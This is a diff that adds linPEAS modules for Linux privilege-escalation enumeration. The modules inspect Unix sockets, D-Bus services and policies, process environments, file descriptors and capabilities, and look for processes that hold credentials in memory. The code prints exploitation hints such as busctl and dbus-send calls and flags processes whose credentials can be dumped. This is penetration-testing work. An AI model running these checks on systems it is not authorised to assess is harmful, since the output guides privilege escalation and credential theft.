            findings="${findings}NETWORK_BIND: Can bind to network interfaces\n"
        fi
        # If any findings, print them
        if [ -n "$findings" ]; then
            echo "Potential privilege escalation in socket file: $socket_file"
            echo "$findings" | while read -r finding; do
                [ -n "$finding" ] && echo "  └─ $finding" | sed -${E} "s,WRITABLE.*,${SED_RED},g" | sed -${E} "s,RELATIVE.*,${SED_RED_YELLOW},g"
            done
        fi
    }
    # Process each socket file
    if [ -n "$PSTORAGE_SOCKET" ]; then
        printf "%s\n" "$PSTORAGE_SOCKET" | while read -r socket_file; do
            if [ -n "$socket_file" ] && [ -e "$socket_file" ]; then
                check_socket_file "$socket_file"
            fi
        done
    else
        print_list "No socket files found" "$NC"
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Unix_sockets_listening.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Unix_sockets_listening.sh
@ -0,0 +1,151 @@
 # Title: Processes & Cron & Services & Timers - Unix Sockets Analysis
 # ID: PR_Unix_sockets_listening
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Analyze Unix sockets for privilege escalation vectors:
 #   - Listening Unix sockets
 #   - Socket file permissions
 #   - Socket ownership
 #   - Socket connectivity
 #   - Socket protocol analysis
 # License: GNU GPL
 # Version: 1.1
 # Functions Used: print_2title, print_info
 # Global Variables: $EXTRA_CHECKS, $groupsB, $groupsVB, $IAMROOT, $idB, $knw_grps, $knw_usrs, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $SED_RED, $SED_GREEN, $NC, $RED
 # Initial Functions:
 # Generated Global Variables: $unix_scks_list, $unix_scks_list2, $perms, $owner, $owner_info, $response, $socket, $cmd, $mode, $group
 # Fat linpeas: 0
 # Small linpeas: 0
 if ! [ "$IAMROOT" ]; then
    if ! [ "$SEARCH_IN_FOLDER" ]; then
        print_2title "Unix Sockets Analysis"
        print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
        # Function to get socket permissions
        get_socket_perms() {
            local socket="$1"
            local perms=""
            # Check read permission
            if [ -r "$socket" ]; then
                perms="Read "
            fi
            # Check write permission
            if [ -w "$socket" ]; then
                perms="${perms}Write "
            fi
            # Check execute permission
            if [ -x "$socket" ]; then
                perms="${perms}Execute "
            fi
            # Check socket mode
            local mode=$(stat -c "%a" "$socket" 2>/dev/null)
            if [ "$mode" = "777" ] || [ "$mode" = "666" ]; then
                perms="${perms}(Weak Permissions: $mode) "
            fi
            echo "$perms"
        }
        # Function to check socket connectivity
        check_socket_connectivity() {
            local socket="$1"
            local perms="$2"
            if [ "$EXTRA_CHECKS" ] && command -v curl >/dev/null 2>&1; then
                # Try to connect to the socket
                if curl -v --unix-socket "$socket" --max-time 1 http:/linpeas 2>&1 | grep -iq "Permission denied"; then
                    perms="${perms} - Cannot Connect"
                else
                    perms="${perms} - Can Connect"
                fi
            fi
            echo "$perms"
        }
        # Function to analyze socket protocol
        analyze_socket_protocol() {
            local socket="$1"
            local owner="$2"
            local response=""
            # Try to get HTTP response
            if command -v curl >/dev/null 2>&1; then
                response=$(curl --max-time 2 --unix-socket "$socket" http:/index 2>/dev/null)
                if [ $? -eq 0 ]; then
                    echo "  └─ HTTP Socket (owned by $owner):" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
                    echo "     └─ Response to /index (limit 30):"
                    echo "$response" | head -n 30 | sed 's/^/       /'
                fi
            fi
        }
        # Function to get socket owner and group
        get_socket_owner() {
            local socket="$1"
            local owner=""
            local group=""
            if [ -e "$socket" ]; then
                owner=$(ls -l "$socket" 2>/dev/null | awk '{print $3}')
                group=$(ls -l "$socket" 2>/dev/null | awk '{print $4}')
                echo "$owner:$group"
            fi
        }
        # Collect listening sockets using multiple methods
        unix_scks_list=""
        for cmd in "ss -xlp -H state listening" "ss -l -p -A 'unix'" "netstat -a -p --unix"; do
            if [ -z "$unix_scks_list" ]; then
                unix_scks_list=$($cmd 2>/dev/null | grep -Eo "/[a-zA-Z0-9\._/\-]+" | grep -v " " | sort -u)
            fi
        done
        # Get additional socket information
        if [ -z "$unix_scks_list" ]; then
            unix_scks_list=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/" | sort -u)
        fi
        # Find socket files
        if ! [ "$SEARCH_IN_FOLDER" ]; then
            unix_scks_list2=$(find / -type s 2>/dev/null)
        else
            unix_scks_list2=$(find "$SEARCH_IN_FOLDER" -type s 2>/dev/null)
        fi
        # Process all found sockets
        (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort -u | while read -r socket; do
            if [ -n "$socket" ] && [ -e "$socket" ]; then
                # Get socket information
                perms=$(get_socket_perms "$socket")
                perms=$(check_socket_connectivity "$socket" "$perms")
                owner_info=$(get_socket_owner "$socket")
                # Print socket information
                if [ -z "$perms" ]; then
                    echo "$socket" | sed -${E} "s,$socket,${SED_GREEN},g"
                else
                    echo "$socket" | sed -${E} "s,$socket,${SED_RED},g"
                    echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
                    # Analyze socket protocol if we can connect
                    if echo "$perms" | grep -q "Can Connect"; then
                        analyze_socket_protocol "$socket" "$owner_info"
                    fi
                    # Highlight dangerous ownership
                    if echo "$owner_info" | grep -q "root"; then
                        echo "  └─(${RED}Owned by root${NC})"
                    fi
                fi
            fi
        done
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_DBus_analysis.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_DBus_analysis.sh
@ -0,0 +1,253 @@
 # Title: Processes & Cron & Services & Timers - D-Bus Analysis
 # ID: PR_DBus_analysis
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Comprehensive D-Bus analysis for privilege escalation vectors:
 #   - D-Bus Service Objects enumeration
 #   - D-Bus Service Object permissions and ownership
 #   - D-Bus Configuration files analysis
 #   - D-Bus Policy analysis
 #   - D-Bus Method and Interface analysis
 #   - D-Bus Privilege Escalation Vectors
 # License: GNU GPL
 # Version: 1.3
 # Functions Used: print_2title, print_3title, print_info, echo_not_found
 # Global Variables: $IAMROOT, $mygroups, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $dbuslistG, $knw_usrs, $rootcommon, $SED_RED, $SED_GREEN, $SED_BLUE, $SED_LIGHT_CYAN, $SED_LIGHT_MAGENTA, $NC
 # Initial Functions:
 # Generated Global Variables: $dbuslist, $srvc_object, $genpol, $userpol, $grppol, $dangerous_service, $pattern, $dir, $weak_policies, $dangerous_services, $dangerous, $dbussrvc_object, $patterns, $methods, $file, $dbusservice, $session_services, $prop, $dangerous_session_services, $interface, $dangerous_methods, $dbus_file, $dbus_service, $method, $dangerous_patterns, $properties, $interfaces, $dangerous_props, $service, $info, $allow_rules
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
    print_2title "D-Bus Analysis"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus"
    # Function to check for dangerous methods
    check_dangerous_methods() {
        service="$1"
        interface="$2"
        dangerous=0
        dangerous_methods=""
        # Common dangerous method patterns - using space-separated string instead of array
        patterns="StartUnit StopUnit RestartUnit EnableUnit DisableUnit SetProperty SetUser SetPassword CreateUser DeleteUser ModifyUser Execute Run Spawn Shell Command Exec Authenticate Login Logout Reboot Shutdown PowerOff Suspend Hibernate Update Install Uninstall Configure Modify Change Delete Remove Add Create Write Read Access Grant Revoke Allow Deny"
        # Get methods for the interface
        methods=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "method" | awk '{print $2}')
        # Check each method against dangerous patterns
        for method in $methods; do
            for pattern in $patterns; do
                if echo "$method" | grep -qi "$pattern"; then
                    dangerous=1
                    dangerous_methods="${dangerous_methods}${method} "
                fi
            done
        done
        if [ "$dangerous" -eq 1 ]; then
            echo "  └─(${RED}Potentially dangerous methods found${NC})"
            echo "     └─ $dangerous_methods" | sed 's/^/        /'
        fi
        return $dangerous
    }
    # Function to check for dangerous properties
    check_dangerous_properties() {
        service="$1"
        interface="$2"
        dangerous=0
        dangerous_props=""
        # Common dangerous property patterns - using space-separated string instead of array
        patterns="Executable Command Path User Group Permission Access Auth Password Secret Key Token Credential Config Setting Policy Rule Allow Deny Write Read Execute"
        # Get properties for the interface
        properties=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "property" | awk '{print $2}')
        # Check each property against dangerous patterns
        for prop in $properties; do
            for pattern in $patterns; do
                if echo "$prop" | grep -qi "$pattern"; then
                    dangerous=1
                    dangerous_props="${dangerous_props}${prop} "
                fi
            done
        done
        if [ "$dangerous" -eq 1 ]; then
            echo "  └─(${RED}Potentially dangerous properties found${NC})"
            echo "     └─ $dangerous_props" | sed 's/^/        /'
        fi
        return $dangerous
    }
    # Function to analyze service object
    analyze_service_object() {
        dbusservice="$1"
        info=""
        dangerous=0
        # Get service status
        info=$(busctl status "$dbusservice" 2>/dev/null)
        # Check for root ownership
        if echo "$info" | grep -qE "^(UID|EUID|OwnerUID)=0"; then
            echo "  └─(${RED}Running as root${NC})"
            dangerous=1
        fi
        # Get service interfaces
        interfaces=$(busctl tree "$dbusservice" 2>/dev/null)
        if [ -n "$interfaces" ]; then
            echo "  └─ Interfaces:"
            echo "$interfaces" | sed 's/^/     /'
            # Check each interface for dangerous methods and properties
            echo "$interfaces" | while read -r interface; do
                if [ -n "$interface" ]; then
                    if check_dangerous_methods "$dbusservice" "$interface"; then
                        dangerous=1
                    fi
                    if check_dangerous_properties "$dbusservice" "$interface"; then
                        dangerous=1
                    fi
                fi
            done
        fi
        # Check for known dangerous services - using space-separated string instead of array
        dangerous_services="org.freedesktop.systemd1 org.freedesktop.PolicyKit1 org.freedesktop.Accounts org.freedesktop.login1 org.freedesktop.hostname1 org.freedesktop.timedate1 org.freedesktop.locale1 org.freedesktop.machine1 org.freedesktop.portable1 org.freedesktop.resolve1 org.freedesktop.timesync1 org.freedesktop.import1 org.freedesktop.export1 org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver"
        for dangerous_service in $dangerous_services; do
            if echo "$dbusservice" | grep -qi "$dangerous_service"; then
                echo "  └─(${RED}Known dangerous service: $dangerous_service${NC})"
                dangerous=1
            fi
        done
        # If service is dangerous, provide exploitation hints
        if [ "$dangerous" -eq 1 ]; then
            echo "  └─(${RED}Potential privilege escalation vector${NC})"
            echo "     └─ Try: busctl call $dbusservice / [Interface] [Method] [Arguments]"
            echo "     └─ Or: dbus-send --session --dest=$dbusservice / [Interface] [Method] [Arguments]"
        fi
    }
    # Function to analyze policy file
    analyze_policy_file() {
        file="$1"
        weak_policies=0
        # Check file permissions
        if ! [ "$IAMROOT" ] && [ -w "$file" ]; then
            echo "  └─(${RED}Writable policy file${NC})"
            weak_policies=$((weak_policies + 1))
        fi
        # Check general policy
        genpol=$(grep "<policy>" "$file" 2>/dev/null)
        if [ -n "$genpol" ]; then
            echo "  └─(${RED}Weak general policy found${NC})"
            echo "     └─ $genpol" | sed 's/^/        /'
            weak_policies=$((weak_policies + 1))
        fi
        # Check user policies
        userpol=$(grep "<policy user=" "$file" 2>/dev/null | grep -v "root")
        if [ -n "$userpol" ]; then
            echo "  └─(${RED}Weak user policy found${NC})"
            echo "     └─ $userpol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g"
            weak_policies=$((weak_policies + 1))
        fi
        # Check group policies
        grppol=$(grep "<policy group=" "$file" 2>/dev/null | grep -v "root")
        if [ -n "$grppol" ]; then
            echo "  └─(${RED}Weak group policy found${NC})"
            echo "     └─ $grppol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"
            weak_policies=$((weak_policies + 1))
        fi
        # Check for allow rules in default context
        allow_rules=$(grep -A 5 "context=\"default\"" "$file" 2>/dev/null | grep "allow")
        if [ -n "$allow_rules" ]; then
            echo "  └─(${RED}Allow rules in default context${NC})"
            echo "     └─ $allow_rules" | sed 's/^/        /'
            weak_policies=$((weak_policies + 1))
        fi
        # Check for specific dangerous policy patterns - using space-separated string instead of array
        dangerous_patterns="allow_any allow_all allow_root allow_user allow_group allow_anonymous allow_any_user allow_any_group allow_any_uid allow_any_gid allow_any_pid allow_any_connection allow_any_method allow_any_property allow_any_signal allow_any_interface allow_any_path allow_any_destination allow_any_sender allow_any_receiver"
        for pattern in $dangerous_patterns; do
            if grep -qi "$pattern" "$file" 2>/dev/null; then
                echo "  └─(${RED}Dangerous policy pattern found: $pattern${NC})"
                weak_policies=$((weak_policies + 1))
            fi
        done
        return $weak_policies
    }
    # Analyze D-Bus Service Objects
    dbuslist=$(busctl list 2>/dev/null)
    if [ -n "$dbuslist" ]; then
        echo "$dbuslist" | while read -r dbus_service; do
            # Print service name with highlighting
            echo "$dbus_service" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
            # Analyze service if it's not in the known list
            if ! echo "$dbus_service" | grep -qE "$dbuslistG"; then
                dbussrvc_object=$(echo "$dbus_service" | cut -d " " -f1)
                analyze_service_object "$dbussrvc_object"
            fi
        done
    else
        echo_not_found "busctl"
    fi
    # Analyze D-Bus Configuration Files
    if [ "$PSTORAGE_DBUS" ]; then
        echo ""
        print_2title "D-Bus Configuration Files"
        echo "$PSTORAGE_DBUS" | while read -r dir; do
            for dbus_file in "$dir"/*; do
                if [ -f "$dbus_file" ]; then
                    echo "Analyzing $dbus_file:"
                    if analyze_policy_file "$dbus_file"; then
                        echo "  └─(${RED}Multiple weak policies found${NC})"
                    fi
                fi
            done
        done
    fi
    # Check for D-Bus session bus
    if command -v dbus-send >/dev/null 2>&1; then
        echo ""
        print_3title "D-Bus Session Bus Analysis"
        if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then
            echo "(${RED}No access to session bus${NC})"
        else
            echo "(${GREEN}Access to session bus available${NC})"
            # List available services on session bus
            session_services=$(dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep "string" | sed 's/^/     /')
            echo "$session_services"
            # Check for known dangerous session services - using space-separated string instead of array
            dangerous_session_services="org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver org.freedesktop.Notifications org.freedesktop.ScreenSaver org.freedesktop.PowerManagement org.freedesktop.UPower org.freedesktop.NetworkManager org.freedesktop.Avahi org.freedesktop.UDisks2 org.freedesktop.ModemManager1 org.freedesktop.PackageKit org.freedesktop.PolicyKit1 org.freedesktop.systemd1 org.freedesktop.Accounts org.freedesktop.login1"
            for dangerous_service in $dangerous_session_services; do
                if echo "$session_services" | grep -qi "$dangerous_service"; then
                    echo "  └─(${RED}Known dangerous session service: $dangerous_service${NC})"
                    echo "     └─ Try: dbus-send --session --dest=$dangerous_service / [Interface] [Method] [Arguments]"
                fi
            done
        fi
    fi
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
@ -0,0 +1,265 @@
 # Title: Processes & Cron & Services & Timers - List processes
 # ID: PR_List_processes
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: List running processes and check for unusual configurations
 # License: GNU GPL
 # Version: 1.4
 # Functions Used: print_2title, print_info, print_ps
 # Global Variables: $capsB, $knw_usrs, $nosh_usrs, $NOUSEPS, $processesB, $processesDump, $processesVB, $rootcommon, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
 # Initial Functions:
 # Generated Global Variables: $pslist, $cpid, $caphex, $psline, $pid, $selinux_ctx, $current_env_vars, $env_findings, $apparmor_profile, $mount, $mount_findings, $fd_findings, $proc_cmd, $proc_user, $mount_point, $current_mounts, $fd_target, $var, $findings, $sec_findings, $proc_env_vars, $fd_count, $proc_mounts, $$escaped_var
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "Running processes (cleaned)"
  if [ "$NOUSEPS" ]; then
    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
  fi
  print_info "Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
  fi
  # Get current process environment variables
  if [ -r "/proc/self/environ" ]; then
    current_env_vars=$(cat /proc/self/environ 2>/dev/null | tr '\0' '\n' | sort)
  else
    current_env_vars=$(env 2>/dev/null | sort)
  fi
  # Get current process mounts
  if [ -r "/proc/self/mountinfo" ]; then
    current_mounts=$(cat /proc/self/mountinfo 2>/dev/null | sort)
  else
    current_mounts=$(mount 2>/dev/null | sort)
  fi
  # Function to check for unusual environment variables
  check_env_vars() {
    local pid="$1"
    local proc_user="$2"
    local proc_cmd="$3"
    local findings=""
    # Skip if we can't read the environment
    [ ! -r "/proc/$pid/environ" ] && return
    # Get process environment variables
    proc_env_vars=$(cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | sort)
    [ -z "$proc_env_vars" ] && return
    # Find environment variables that the target process has but we don't
    if [ -n "$current_env_vars" ]; then
      echo "$proc_env_vars" | while read -r var; do
        if [ -n "$var" ]; then
          # Escape special regex characters in var
          escaped_var=$(echo "$var" | sed 's/[][^$.*+?(){}|]/\\&/g')
          if ! echo "$current_env_vars" | grep -q "^$escaped_var$"; then
            if [ -z "$findings" ]; then
              findings="Has additional environment variables:"
            fi
            findings="$findings\n  └─ $var"
          fi
        fi
      done
    else
      # If we can't get current env vars, just show all process env vars
      findings="Has environment variables:"
      echo "$proc_env_vars" | while read -r var; do
        if [ -n "$var" ]; then
          findings="$findings\n  └─ $var"
        fi
      done
    fi
    # Return findings if any
    if [ -n "$findings" ]; then
      echo "$findings"
    fi
  }
  # Function to check for unusual security contexts
  check_security_context() {
    local pid="$1"
    local proc_user="$2"
    local proc_cmd="$3"
    local findings=""
    # Check SELinux context
    if [ -r "/proc/$pid/attr/current" ]; then
      selinux_ctx=$(cat "/proc/$pid/attr/current" 2>/dev/null)
      if [ -n "$selinux_ctx" ] && [ "$selinux_ctx" != "unconfined" ]; then
        findings="SELinux context: $selinux_ctx"
      fi
    fi
    # Check AppArmor profile
    if [ -r "/proc/$pid/attr/apparmor/current" ]; then
      apparmor_profile=$(cat "/proc/$pid/attr/apparmor/current" 2>/dev/null)
      if [ -n "$apparmor_profile" ] && [ "$apparmor_profile" != "unconfined" ]; then
        if [ -n "$findings" ]; then
          findings="$findings\n  └─ AppArmor profile: $apparmor_profile"
        else
          findings="AppArmor profile: $apparmor_profile"
        fi
      fi
    fi
    # Return findings if any
    if [ -n "$findings" ]; then
      echo "$findings"
    fi
  }
  # Function to check for unusual mount namespaces
  check_mount_namespace() {
    local pid="$1"
    local proc_user="$2"
    local proc_cmd="$3"
    local findings=""
    # Skip if we can't read the mountinfo
    [ ! -r "/proc/$pid/mountinfo" ] && return
    # Get process mounts
    proc_mounts=$(cat "/proc/$pid/mountinfo" 2>/dev/null | sort)
    [ -z "$proc_mounts" ] && return
    # Find mounts that the target process has but we don't
    if [ -n "$current_mounts" ]; then
      echo "$proc_mounts" | while read -r mount; do
        if [ -n "$mount" ] && ! echo "$current_mounts" | grep -q "^$mount$"; then
          mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
          if [ -z "$findings" ]; then
            findings="Has additional mounts:"
          fi
          findings="$findings\n  └─ $mount_point"
        fi
      done
    else
      # If we can't get current mounts, just show all process mounts
      findings="Has mounts:"
      echo "$proc_mounts" | while read -r mount; do
        if [ -n "$mount" ]; then
          mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
          findings="$findings\n  └─ $mount_point"
        fi
      done
    fi
    # Return findings if any
    if [ -n "$findings" ]; then
      echo "$findings"
    fi
  }
  # Function to check for unusual file descriptors
  check_file_descriptors() {
    local pid="$1"
    local proc_user="$2"
    local proc_cmd="$3"
    local findings=""
    # Skip if we can't read the file descriptors
    [ ! -r "/proc/$pid/fd" ] && return
    # Check for interesting file descriptors
    for fd in /proc/$pid/fd/*; do
      # Skip if fd doesn't exist or we can't access it
      [ ! -e "$fd" ] && continue
      # Get fd target
      fd_target=$(readlink "$fd" 2>/dev/null)
      [ -z "$fd_target" ] && continue
      # Skip if target doesn't exist
      [ ! -e "$fd_target" ] && continue
      # Check if we can access the FD but not the target file
      if [ -r "$fd" ] && [ ! -r "$fd_target" ]; then
        if [ -z "$findings" ]; then
          findings="Readable FD to unreadable file: $fd -> $fd_target"
        else
          findings="$findings\n  └─ Readable FD to unreadable file: $fd -> $fd_target"
        fi
      fi
      if [ -w "$fd" ] && [ ! -w "$fd_target" ]; then
        if [ -z "$findings" ]; then
          findings="Writable FD to unwritable file: $fd -> $fd_target"
        else
          findings="$findings\n  └─ Writable FD to unwritable file: $fd -> $fd_target"
        fi
      fi
    done
    # Check for unusual number of file descriptors
    fd_count=$(ls -1 "/proc/$pid/fd" 2>/dev/null | wc -l)
    [ -z "$fd_count" ] && return
    # If process has more than 100 file descriptors, it might be interesting
    if [ "$fd_count" -gt 100 ]; then
      if [ -z "$findings" ]; then
        findings="Unusual number of FDs: $fd_count"
      else
        findings="$findings\n  └─ Unusual number of FDs: $fd_count"
      fi
    fi
    # Return findings if any
    if [ -n "$findings" ]; then
      echo "$findings"
    fi
  }
  if [ "$NOUSEPS" ]; then
    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
    pslist=$(print_ps)
  else
    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
      if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q "root"; then
        cpid=$(echo "$psline" | awk '{print $2}')
        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
        fi
      fi
    done
    pslist=$(ps auxwww)
    echo ""
  fi
  # Additional checks for each process
  print_2title "Processes with unusual configurations"
  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
    # Skip if process doesn't exist or we can't access it
    [ ! -d "/proc/$pid" ] && continue
    # Get process user and command
    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
    # Run all checks and collect findings
    sec_findings=$(check_security_context "$pid" "$proc_user" "$proc_cmd")
    mount_findings=$(check_mount_namespace "$pid" "$proc_user" "$proc_cmd")
    fd_findings=$(check_file_descriptors "$pid" "$proc_user" "$proc_cmd")
    env_findings=$(check_env_vars "$pid" "$proc_user" "$proc_cmd")
    # If any findings exist, print process info and findings
    if [ -n "$env_findings" ] || [ -n "$sec_findings" ] || [ -n "$mount_findings" ] || [ -n "$fd_findings" ]; then
      echo "Process $pid ($proc_user) - $proc_cmd"
      [ -n "$env_findings" ] && echo "$env_findings"
      [ -n "$sec_findings" ] && echo "$sec_findings"
      [ -n "$mount_findings" ] && echo "$mount_findings"
      [ -n "$fd_findings" ] && echo "$fd_findings"
      echo ""
    fi
  done
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
@ -0,0 +1,103 @@
 # Title: Processes & Cron & Services & Timers - Processes with credentials inside memory
 # ID: PR_Process_cred_in_memory
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Processes with credentials inside memory and memory-mapped files
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $pslist, $SEARCH_IN_FOLDER, $processesDump, $nosh_usrs, $processesB, $knw_usrs, $rootcommon, $sh_usrs, $processesVB
 # Initial Functions:
 # Generated Global Variables: $line, $cred_files, $filename, $fd_target, $found_cred_files, $proc, $proc_cmd, $pid, $proc_user, $cred_processes, $seen_files
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "Processes with credentials in memory (root req)"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory"
  # Common credential-storing processes
  cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer"
  # Check for credential-storing processes
  for proc in $cred_processes; do
    if echo "$pslist" | grep -q "$proc"; then
      echo "$proc process found (dump creds from memory as root)" | sed "s,$proc,${SED_RED},"
    else
      echo_not_found "$proc"
    fi
  done
  # Check for processes with open handles to credential files
  echo ""
  print_2title "Opened Files by processes"
  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
    # Skip if process doesn't exist or we can't access it
    [ ! -d "/proc/$pid" ] && continue
    [ ! -r "/proc/$pid/fd" ] && continue
    # Get process user and command
    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
    # Skip processes that start with "sed " or contain "linpeas.sh"
    echo "$proc_cmd" | grep -q "^sed " && continue
    echo "$proc_cmd" | grep -q "linpeas.sh" && continue
    # Variable to store unique files for this process
    seen_files=""
    found_cred_files=""
    # Check for open credential files
    for fd in /proc/$pid/fd/*; do
      [ ! -e "$fd" ] && continue
      fd_target=$(readlink "$fd" 2>/dev/null)
      [ -z "$fd_target" ] && continue
      [ "$fd_target" = "/dev/null" ] && continue
      echo "$fd_target" | grep -q "^socket:" && continue
      echo "$fd_target" | grep -q "^anon_inode:" && continue
      # Only add if not already seen (using case to check)
      case " $seen_files " in
        *" $fd_target "*) continue ;;
        *)
          seen_files="$seen_files $fd_target"
          if [ -z "$found_cred_files" ]; then
            echo "Process $pid ($proc_user) - $proc_cmd"
            echo "  └─ Has open files:"
            found_cred_files="yes"
          fi
          echo "    └─ $fd_target"
          ;;
      esac
    done
  done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
  # Check for processes with memory-mapped files that might contain credentials
  echo ""
  print_2title "Processes with memory-mapped credential files"
